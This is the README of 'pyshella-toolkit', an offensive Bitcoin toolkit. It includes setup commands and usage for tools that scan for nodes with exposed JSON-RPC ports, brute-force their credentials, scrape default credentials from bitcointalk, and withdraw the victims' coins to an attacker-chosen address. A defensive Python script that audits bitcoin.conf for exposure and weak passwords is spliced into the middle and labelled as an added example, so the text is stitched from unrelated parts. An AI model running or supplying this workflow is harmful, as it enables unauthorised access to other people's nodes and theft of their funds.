This is a simple toolkit for Bitcoin or Bitcoin forks, which contains CLI scripts such as peers-scanner, jsonrpc-searcher, jsonrpc-bruter and coins-withdrawal.
This set of scripts allows you to find peers with the JSON-RPC port open to the outside, then run a brute-force attack against them and withdraw the coins.
Disclaimer: This toolkit was created for research purposes; use it at your own peril and risk. The author of this toolkit is not responsible for your actions.
Donate if you like it:
bitcoin -> bc1qqkr72aemz59aawxf74gytrwuw4m9mj20t7e7df
ethereum -> 0xB3e5b643cFB9e2565a3456eC7c7A73491A32e31F
mkdir -p ~/pyshella-toolkit/wordlists && mkdir ~/pyshella-toolkit/logs
git clone https://github.com/mkbeh/pyshella-toolkit
cd pyshella-toolkit/
pip3.7 install wheel
python3.7 setup.py bdist_egg --exclude-source-files
python3.7 -m easy_install --install-dir ~/.local/lib/python3.7/site-packages --prefix=$HOME/.local dist/<package>
# NOTE: if this fails, first set PYTHONPATH (adjust to your path) and try again
export PYTHONPATH=~/.local/lib/python3.7/site-packages
sudo apt-key adv --keyserver hkp://keyserver.ubuntu.com:80 --recv 9DA31620334BD75D9DCB49F368818C72E52529D4
echo "deb [ arch=amd64 ] https://repo.mongodb.org/apt/ubuntu bionic/mongodb-org/4.0 multiverse" | sudo tee /etc/apt/sources.list.d/mongodb-org-4.0.list
sudo apt-get update
sudo apt-get install -y mongodb-org
mkdir -p /data/db
echo "mongodb-org hold" | sudo dpkg --set-selections
echo "mongodb-org-server hold" | sudo dpkg --set-selections
echo "mongodb-org-shell hold" | sudo dpkg --set-selections
echo "mongodb-org-mongos hold" | sudo dpkg --set-selections
echo "mongodb-org-tools hold" | sudo dpkg --set-selections
# Start MongoDB
mongod
# Connect to the instance
mongo
# Use database
use admin
# Create the user administrator
db.createUser({user: "admin", pwd: "admin", roles: ["root"]})
# Re-start the MongoDB instance with access control
db.adminCommand({ shutdown: 1})
# Exit from mongo cli
exit
# -- Run mongo daemon --
mongod --auth -f /etc/mongod.conf
# -- Check connection --
mongo --host <ip:20777> -u "admin" --authenticationDatabase "admin" -p
git clone https://github.com/mkbeh/pyshella-toolkit
cd pyshella-toolkit/
chmod +x toolkit.sh
mkdir -p ~/pyshella-toolkit
# Set your data in the `program` sections of `toolkit.conf`.
vi toolkit.conf
--- IMPORTANT NOTE ---
# If you do not want to run the spider,
# add your dictionaries to the directory
# ~/pyshella-toolkit/wordlists on the host.
# This directory is shared between the host
# and the container.
# Next, build the Docker image.
docker build -t pyshella-toolkit:0.56.30 .
Available modes to launch the container:
- DEBUG - the running container will output data from the log file in real time for all utilities from the toolkit with errors and success data.
- BATTLE - without output data from the log file in real time.
Crawler modes:
- ACTIVATE - activates the crawler, which crawls the bitcointalk.org ANN section searching for default credentials, then creates 2 files with RPC users and RPC passwords.
- INACTIVATE - uses the dictionaries from `toolkit.conf`.
# -- Docker run examples for each supported mode --
# -- DEBUG:
docker run --name <coin_name> -v ~/pyshella-toolkit:/pyshella-toolkit -e "ENV=DEBUG" --network host pyshella-toolkit:<version>
# -- BATTLE:
docker run -itd --name <coin_name> -v ~/pyshella-toolkit:/pyshella-toolkit -e "ENV=BATTLE" --network host pyshella-toolkit:<version>
# EDIT THIS
docker run -v ~/pyshella-toolkit:/pyshella-toolkit/shared -e "ENV=DEBUG" -e "CRAWLER=ACTIVATE" --network host pyshella-toolkit:<version>
# -- NOTE --
If your database is on a remote host, then
option `--network` with value `host` can be omitted.
Log files are located on the host at ~/pyshella-toolkit/logs/
Crawler which searches for default RPC credentials in each topic of the ANN section.
Important note: This process may take more than a few hours, please be patient.
cd btt_spider
scrapy crawl creds_crawler
The peers scanner scans the network for available peers and writes them to a file. For new peers, old ones are blacklisted.
usage: pyshella-peers-scanner [-h] -nU [-b] [-i] -mU -n
optional arguments:
-h, --help show this help message and exit
-nU , --node-uri Node URI.
-b , --ban-time The time(days) which will be banned each peer (by
default 14 days).
-i , --interval Interval(secs) between call cycles for new peers (by
default 60 secs).
-mU , --mongo-uri MongoDB uri.
-n , --coin-name Name of cryptocurrency.
-----------------------------------------------------------------------------
Usage example: pyshella-peers-scanner -nU <node_uri> -mU <mongo_uri> -n <coin_name>
Scanner which discovers Bitcoin/forks JSON-RPC on peers.
usage: pyshella-jsonrpc-searcher [-h] -n NAME [-mU URI] [-cT SECS] [-rT SECS]
[-bT SECS] [-hS NUM] [-pS NUM] [-v BOOL]
optional arguments:
-h, --help show this help message and exit
-n NAME, --coin-name NAME
Name of cryptocurrency.
-mU URI, --mongo-uri URI
MongoDB URI. Default:
mongodb://root:toor@localhost:27017
-cT SECS Timeout between hosts block cycles.
-rT SECS Time to wait for a response from the server after
sending the request.
-bT SECS Delay between block cycles.
-hS NUM The number of hosts that will be processed
simultaneously.
-pS NUM The number of ports that will be processed
simultaneously for each host.
-v BOOL Activate verbose mode. Will show all found headers.
-----------------------------------------------------
Usage example: pyshella-jsonrpc-searcher -n Bitcoin -bT 1 -hS 1 -pS 200 -v True
Bitcoin/fork JSON-RPC bruter. Based on asyncio.
usage: pyshella-jsonrpc-bruter [-h] -n NAME [-mU URI] -l SINGLE/FILE -p
SINGLE/FILE [-b ORDER] [-t NUM] [-rT SECS]
[-cT SECS]
optional arguments:
-h, --help show this help message and exit
-n NAME, --coin-name NAME
Name of cryptocurrency.
-mU URI, --mongo-uri URI
MongoDB URI. Default:
mongodb://root:toor@localhost:27017
-l SINGLE/FILE, --logins SINGLE/FILE
Single login or file with logins.
-p SINGLE/FILE, --passwords SINGLE/FILE
Single password or file with passwords.
-b ORDER, --brute-order ORDER
The order in which the brute force process will occur.
Where H - hosts, L - logins, P - passwords. Default:
HLP. Examples: HLP, LPH, PHL, etc.
-t NUM, --threads NUM
The number of coroutines that will be asynchronous in
bruteforce process.
-rT SECS, --read-timeout SECS
Time to wait for a response from the server after
sending the request.
-cT SECS, --cycle-timeout SECS
Timeout between getting new data for brute.
----------------------------------------------------------------------------------------------
Usage example:
-> pyshella-jsonrpc-bruter --help
-> pyshella-jsonrpc-bruter -n Bitcoin -t 20 -l <logins_file> -p <pwds_file> -b HLP
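The searcher and bruter above depend on a node that exposes JSON-RPC beyond localhost and accepts guessable credentials. As an added example (not part of the toolkit), this audits a `bitcoin.conf` from the node operator's side. Option names are Bitcoin Core's and may differ on forks; the local-network list, weak-value set and 16-character threshold are assumptions.

```python
import ipaddress

# Networks treated as local for this audit (an assumption; adjust to your environment).
LOCAL_NETS = [ipaddress.ip_network(n) for n in
              ("127.0.0.0/8", "::1/128", "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
# Constructed examples of guessable values, not taken from any real wordlist.
WEAK_VALUES = {"", "rpcuser", "rpcpassword", "user", "password", "bitcoin", "admin", "changeme"}
# Constructed sample configurations; <salt> and <hash> are placeholders.
SAMPLE = ("server=1\nrpcuser=bitcoin\nrpcpassword=bitcoin\nrpcbind=0.0.0.0:8332\n"
          "rpcallowip=0.0.0.0/0\nrpcallowip=192.168.1.0/255.255.255.0\n")
HARDENED = "server=1\nrpcbind=127.0.0.1\nrpcallowip=127.0.0.1\nrpcauth=alice:<salt>$<hash>\n"

def parse_conf(text):
    """Return {key: [values]} from bitcoin.conf-style text (key=value, # comments, [sections])."""
    opts = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith("[") or "=" not in line:
            continue
        key, value = (part.strip() for part in line.split("=", 1))
        opts.setdefault(key.split(".")[-1], []).append(value)  # drop "main."-style prefix
    return opts

def strip_port(value):
    """Remove an optional :port from an rpcbind value ("[::]:8332", "0.0.0.0:8332")."""
    if value.startswith("["):
        return value[1:].partition("]")[0]
    return value.split(":")[0] if value.count(":") == 1 else value

def is_local(value):
    """True when an address or network lies entirely inside LOCAL_NETS."""
    try:
        net = ipaddress.ip_network(value, strict=False)
    except ValueError:
        return False  # unparsable: report it rather than assume it is safe
    return any(net.version == loc.version and net.subnet_of(loc) for loc in LOCAL_NETS)

def audit(text):
    """Return a list of findings about RPC exposure and credential strength."""
    opts, findings = parse_conf(text), []
    for value in opts.get("rpcallowip", []):
        if not is_local(value):
            findings.append(f"rpcallowip={value} admits non-local clients")
    for value in opts.get("rpcbind", []):
        if not is_local(strip_port(value)):
            findings.append(f"rpcbind={value} listens on a non-local address")
    for pw in opts.get("rpcpassword", []):
        if pw.lower() in WEAK_VALUES or pw in opts.get("rpcuser", []) or len(pw) < 16:
            findings.append("rpcpassword is short, guessable or equal to rpcuser; "
                            "use rpcauth or cookie auth")
    return findings
```

`audit(SAMPLE)` reports the wildcard `rpcallowip`, the `0.0.0.0` bind and the weak password, while `audit(HARDENED)` returns no findings.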
Utility which withdraws cryptocurrency from brute-forced JSON-RPC.
usage: pyshella-coins-withdrawal [-h] -n NAME -mU URI -a ADDR [-i SECS]
optional arguments:
-h, --help show this help message and exit
-n NAME, --coin-name NAME
Name of cryptocurrency.
-mU URI, --mongo-uri URI
MongoDB uri.
-a ADDR, --withdrawal-address ADDR
The address to which the coins will be sent.
-i SECS, --interval SECS
Timeout after coins withdrawal from all the peers that
were collected in the database at the moment.
-----------------------------------------------------------------------------------------------------------------------
Usage example: pyshella-coins-withdrawal -n Bitcoin -mU mongodb://root:toor@localhost:27017 -a <withdrawal_addr> -i 300